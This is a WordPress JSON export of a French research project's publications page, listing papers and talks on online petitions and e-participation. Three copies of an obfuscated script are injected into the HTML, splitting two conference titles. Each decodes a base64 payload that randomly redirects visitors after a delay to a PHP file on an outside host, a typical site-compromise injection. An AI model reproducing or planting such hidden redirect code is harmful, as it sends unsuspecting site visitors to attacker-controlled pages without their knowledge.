{"id":155,"date":"2015-10-17T15:15:12","date_gmt":"2015-10-17T14:15:12","guid":{"rendered":"http:\/\/textopol2.u-pec.fr\/anr-appel\/?page_id=155"},"modified":"2016-10-07T10:52:35","modified_gmt":"2016-10-07T09:52:35","slug":"publications-et-communications","status":"publish","type":"page","link":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/publications-et-communications\/","title":{"rendered":"Publications et communications"},"content":{"rendered":"<h2>Publications<\/h2>\n<ul>\n<li>Marcel Moritz\u00a0(2015).\u00a0<strong>La clause attributive de comp\u00e9tence figurant dans les conditions g\u00e9n\u00e9rales de Facebook pr\u00e9sente un caract\u00e8re abusif<\/strong>.\u00a0<em>Revue Lamy Droit de l&rsquo;immat\u00e9riel<\/em>, Lamy (imprim\u00e9) \/ Wolters Kluwer \u00e9dition \u00e9letronique 2015, 115, p. 16-18.<\/li>\n<li>Marcel Moritz (2015). <strong>Les sp\u00e9cificit\u00e9s juridiques des conditions g\u00e9n\u00e9rales d\u2019utilisation applicables aux r\u00e9seaux sociaux<\/strong>. Philippe Mouron, Carine Piccio. <em>L\u2019ordre public num\u00e9rique. Libert\u00e9s, Propri\u00e9t\u00e9s, identit\u00e9s<\/em>, PUAM, pp.139-150, Inter-normes.<\/li>\n<\/ul>\n<h2>Communications<\/h2>\n<ul style=\"text-align: justify;\">\n<li>Jean-Gabriel Contamin, Martine Legris Revel, Thomas L\u00e9onard. <strong><a href=\"https:\/\/ecpr.eu\/Events\/PaperDetails.aspx?PaperID=31115&amp;EventID=95\">The e-petitioning, extension or substitute for political participation? A new way to study the sociology of e-petitioners<\/a><\/strong>.\u00a0<em>ECPR General Conference, Panel\u00a0Internet <script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>and Political Participation: Traditional Question, New Research Designs <script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>and Data<\/em>, 7-10 septembre 2016,\u00a0Prague, R\u00e9publique Tch\u00e8que.<\/li>\n<li>Martine Legris Revel,\u00a0Jean-Gabriel Contamin. <strong><a href=\"https:\/\/isaconf.confex.com\/isaconf\/forum2016\/webprogram\/Paper82703.html\">When Participatory Research Tackles Environmental Stakes. Science, Democracy <script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>and Expertise<\/a><\/strong>.\u00a0<em>Third ISA Forum of Sociology<\/em>, 10-14 juillet 2016, Vienne, Autriche.<\/li>\n<li>Christine Barats, Anne Dister, Philippe Gambette, Jean-Marc Leblanc, Marie Peres-Leblanc. <strong><a href=\"https:\/\/hal-upec-upem.archives-ouvertes.fr\/ANR-APPEL\/hal-01302218v1\">Analyser des p\u00e9titions en ligne : potentialit\u00e9s et limites d'un dispositif d'\u00e9tude pluridisciplinaire<\/a><\/strong>. <em>Actes des Journ\u00e9es internationales d'Analyse statistique des Donn\u00e9es Textuelles (JADT 2016)<\/em>, 7-10 juin 2016,\u00a0Nice, France.<\/li>\n<li>Jean-Gabriel Contamin,\u00a0Thomas L\u00e9onard,\u00a0Thomas Soubiran.\u00a0<strong><a title=\"\" href=\"https:\/\/hal.archives-ouvertes.fr\/hal-01217437\" data-toggle=\"tooltip\" data-placement=\"bottom\" data-original-title=\"Voir la ressource\">Les transformations des comportements politiques au prisme de l'e-p\u00e9titionnement : potentialit\u00e9s et limites d'un dispositif d'\u00e9tude pluridisciplinaire<\/a><\/strong>,<i> \u00c9tudier le Web politique : Regards crois\u00e9s<\/i>, 12-13 mai 2015, Lyon, France<\/li>\n<\/ul>\n<h2>S\u00e9minaires<\/h2>\n<ul style=\"text-align: justify;\">\n<li>Christine Barats, Jean-Marc Leblanc, Marie Peres-Leblanc, Journ\u00e9es du CEDITEC, <em>les p\u00e9titions en ligne, approches crois\u00e9es<\/em>, 11 mars 2016, Cr\u00e9teil, France.<\/li>\n<\/ul>\n<p><em>Retrouvez <a href=\"https:\/\/hal.archives-ouvertes.fr\/search\/index\/?qa%5BanrProjectReference_t%5D%5B%5D=ANR-14-CE29-0010&amp;qa%5Btext%5D%5B%5D=&amp;submit_advanced=Rechercher&amp;docType_s=ART+OR+COMM+OR+COUV+OR+OTHER+OR+OUV+OR+DOUV+OR+UNDEFINED+OR+REPORT+OR+THESE+OR+HDR+OR+LECTURE&amp;rows=100\">sur HAL<\/a> les publications et communications issues de ce projet.<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Publications Marcel Moritz\u00a0(2015).\u00a0La clause attributive de comp\u00e9tence figurant dans les conditions g\u00e9n\u00e9rales de Facebook pr\u00e9sente un caract\u00e8re abusif.\u00a0Revue Lamy Droit de l&rsquo;immat\u00e9riel, Lamy (imprim\u00e9) \/ Wolters Kluwer \u00e9dition \u00e9letronique 2015, 115, p. 16-18. Marcel Moritz (2015). Les sp\u00e9cificit\u00e9s juridiques des &hellip; <a href=\"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/publications-et-communications\/\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/155"}],"collection":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/comments?post=155"}],"version-history":[{"count":15,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/155\/revisions"}],"predecessor-version":[{"id":264,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/155\/revisions\/264"}],"wp:attachment":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/media?parent=155"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}